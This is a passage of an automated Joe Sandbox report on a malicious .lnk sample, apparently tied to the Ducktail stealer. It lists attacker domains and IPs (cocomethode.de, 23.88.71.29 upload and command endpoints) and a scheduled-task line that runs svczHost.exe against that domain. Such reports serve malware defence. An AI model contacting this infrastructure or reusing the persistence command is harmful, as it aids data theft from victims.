0000001D.00000002.3918190296.0000012F814F4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/PesterXz	powershell.exe, 00000003.00000002.3414023964.000001942E3BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3639823852.000001EE9936B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.000002872699E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AAA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F8022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.openxmlformats.or	powershell.exe, 00000008.00000002.3592553413.0000028E77CDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.3414023964.000001942E191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3639823852.000001EE99141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028726771000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AA851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F80001000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	false		high
http://.jpg	svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba3d5701147fe15	powershell.exe, 00000004.00000002.3639823852.000001EE9AAA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3639823852.000001EE9B466000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.3430851263.000001943E212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3430851263.000001943E349000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3414023964.000001942F682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3747065999.000001EEA934A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3747065999.000001EEA91B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3578342341.0000028E6F3D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E60984000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.4968117998.00000287367E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.4235808464.000001F1BAA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.4235808464.000001F1BA8C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.4296362446.0000012F90072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F814F4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000008.00000002.3530703045.0000028E60744000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028727430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.4390124778.0000012FE8295000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba756de8aa750b3	powershell.exe, 00000004.00000002.3639823852.000001EE99533000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.3530703045.0000028E60804000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.000002872699E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AAA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F8022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028726CF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.3530703045.0000028E60804000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3586894637.0000028E7763F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.000002872699E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AAA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F8022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000008.00000002.3530703045.0000028E600C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E606A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E60483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AB3D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F80CA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F809B8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/file2/8a84c3609323de6cd9c25a1851d0dcd8a2f3b09776bf8e7d4d6402a6720c1add89a23d5	powershell.exe, 0000000D.00000002.3915653864.000002872699E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028726771000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/MartinKuschnik/WmiLight	myRdpService.exe, 0000002E.00000000.4544640456.00007FF691CC8000.00000002.00000001.01000000.0000000A.sdmp	false		high
http://pesterbdd.com/images/Pester.pngh	powershell.exe, 00000003.00000002.3414023964.000001942F514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3414023964.000001942F530000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E6082F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E60804000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/nativeaot-compatibilityy	svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000001D.00000002.3918190296.0000012F814F4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cocomethode.de/file2/b0cdda893b0765c99d30cddae6fd74c48ea8c4a5922a60ed3ef018a1ea2b77873615eb3	powershell.exe, 00000004.00000002.3639823852.000001EE9AAA8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba82954e6a4403f	powershell.exe, 0000000D.00000002.3915653864.0000028726B7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028727E56000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.3530703045.0000028E60804000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.000002872699E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AAA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F8022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cocomethode.de/file2/b0c	powershell.exe, 00000004.00000002.3639823852.000001EE9AAA8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlXz	powershell.exe, 00000003.00000002.3414023964.000001942E3BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3639823852.000001EE9936B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.000002872699E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AAA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F8022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba22e5a0273f4d6	powershell.exe, 00000004.00000002.3639823852.000001EE99533000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.microsof	powershell.exe, 00000008.00000002.3586894637.0000028E7771D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028726CF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/nativeaot-compatibilityY	myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	false		high
https://github.com/Pester/Pesterh	powershell.exe, 00000003.00000002.3414023964.000001942F514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3414023964.000001942F530000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E6082F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E60804000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.htmlh	powershell.exe, 00000003.00000002.3414023964.000001942F514000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3414023964.000001942F530000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E6082F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E60804000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.microsoft.c	powershell.exe, 0000001D.00000002.4345684918.0000012FE7378000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/GlobalizationInvariantMode	svczHost.exe, 00000015.00000000.3884332479.00007FF7D7BBB000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002E.00000000.4544640456.00007FF691E0C000.00000002.00000001.01000000.0000000A.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000003.00000002.3414023964.000001942E191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3639823852.000001EE99141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.0000028726771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AA851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F80001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.o	powershell.exe, 00000019.00000002.4318304566.000001F1C2D0B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://oneget.org	powershell.exe, 00000008.00000002.3530703045.0000028E60744000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cocomethode.de/609aafcaa17aae4dc51ce49a2e84612a74368b57f	powershell.exe, 00000004.00000002.3639823852.000001EE9AA8C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cocomethode.de/file2/30bb492ec87899a2b4a8fa5c9eeec469631d83b6fb1545c37afc33eb58d196c823652f5	powershell.exe, 0000000D.00000002.3915653864.0000028726B7F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pesterbdd.com/images/Pester.pngXz	powershell.exe, 00000003.00000002.3414023964.000001942E3BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3639823852.000001EE9936B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3530703045.0000028E5F598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3915653864.000002872699E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3945162277.000001F1AAA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F8022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.3918190296.0000012F802A3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.88.71.29	unknown	United States		18978	ENZUINC-US	false
172.67.128.139	cocomethode.de	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573018
Start date and time:	2024-12-11 12:56:26 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	57
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	MdmRznA6gx.lnk
Detection:	MAL
Classification:	mal100.troj.expl.evad.winLNK@81/59@1/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 83% Number of executed functions: 44 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, TextInputHost.exe
Excluded IPs from analysis (whitelisted): 52.109.20.38, 52.111.236.23, 52.113.194.132, 52.109.16.113, 52.168.117.169, 52.111.229.19, 64.233.176.94, 20.190.135.16
Excluded domains from analysis (whitelisted): prod.ols.live.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, prod.configsvc1.live.com.akadns.net, scus-azsc-config.officeapps.live.com, self.events.data.microsoft.com, ctldl.windowsupdate.com, onedscolprdeus10.eastus.cloudapp.azure.com, s-0005-office.config.skype.com, prod.nexusrules.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, login.live.com, s-0005.s-msedge.net, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, officeclient.microsoft.com, ecs.office.trafficmanager.net, www.gstatic.com, nexusrules.officeapps.live.com, api.msn.com, ols.officeapps.live.com
Execution Graph export aborted for target powershell.exe, PID 4092 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4780 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7808 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8520 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8528 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8704 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: MdmRznA6gx.lnk

Simulations

Behavior and APIs

Time	Type	Description
06:58:26	API Interceptor	7576x Sleep call for process: powershell.exe modified
12:59:15	Task Scheduler	Run new task: zServicecakoi10 path: C:\Windows\Temp\svczHost.exe s>cakoi10 cocomethode.de

LLM Input / Output

Input	Output
URL: Screenshot id: 23 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name:", "Email Address:", "Phone Number:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name", "Email Address", "Phone Number" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 24 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name:", "Email Address:", "Phone Number:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 12 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name:", "Email Address:", "Phone Number:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 18 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": ["Full Name:", "Email Address:", "Phone Number:"], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 21 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name:", "Email Address:", "Phone Number:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 13 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name:", "Email Address:", "Phone Number:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name:", "Email Address:", "Phone Number:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name:", "Email Address:", "Phone Number:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 15 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name", "Email Address", "Phone Number" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 22 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name:", "Email Address:", "Phone Number:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 16 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name:", "Email Address:", "Phone Number:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 19 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name", "Email Address", "Phone Number" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 11 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name", "Email Address", "Phone Number" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 14 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name", "Email Address", "Phone Number" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 20 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name:", "Email Address:", "Phone Number:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name", "Email Address", "Phone Number", "Company/Organization", "Meeting Date", "Preferred Time Slot" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 24 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name", "Email Address", "Phone Number" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 7 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 23 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 18 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 16 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 20 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 15 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 5 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 13 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 17 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name", "Email Address", "Phone Number" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 22 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 12 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 11 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 21 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 19 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 8 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 14 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 9 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 17 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": [ "Full Name:", "Email Address:", "Phone Number:" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: Screenshot id: 10 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.88.71.29	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	0A3NB8ot11.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	kingsmaker_4.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/command/ws
	kingsmaker_6.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
	kingsmaker.ca.ps1	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/29b7a8f8d9967ca4c3166269aa4de757
	Job Description.lnk (2).download.lnk	Get hash	malicious	Ducktail	Browse	23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2
172.67.128.139	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
	WXahq3ZEss.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
	rRtGI3L0ca.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
	Cj3OWJHzls.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
	3y37oMIUy6.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
	m9c7iq9nzP.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check
	L0jeOoavu4.lnk	Get hash	malicious	Ducktail	Browse	cocomethode.de/api/check

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
